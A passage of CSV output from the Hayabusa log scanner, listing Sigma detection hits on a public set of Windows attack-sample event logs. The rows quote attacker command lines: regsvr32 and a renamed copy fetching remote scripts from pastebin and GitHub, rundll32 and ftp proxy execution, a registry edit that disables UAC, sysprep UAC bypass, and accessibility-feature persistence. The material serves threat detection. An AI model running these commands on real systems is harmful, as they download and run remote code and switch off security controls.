+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: 
IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious 
ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA 
scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 
+09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : 
User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 
+09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k 
netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network 
Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:38:19.630 
+09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: 
C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 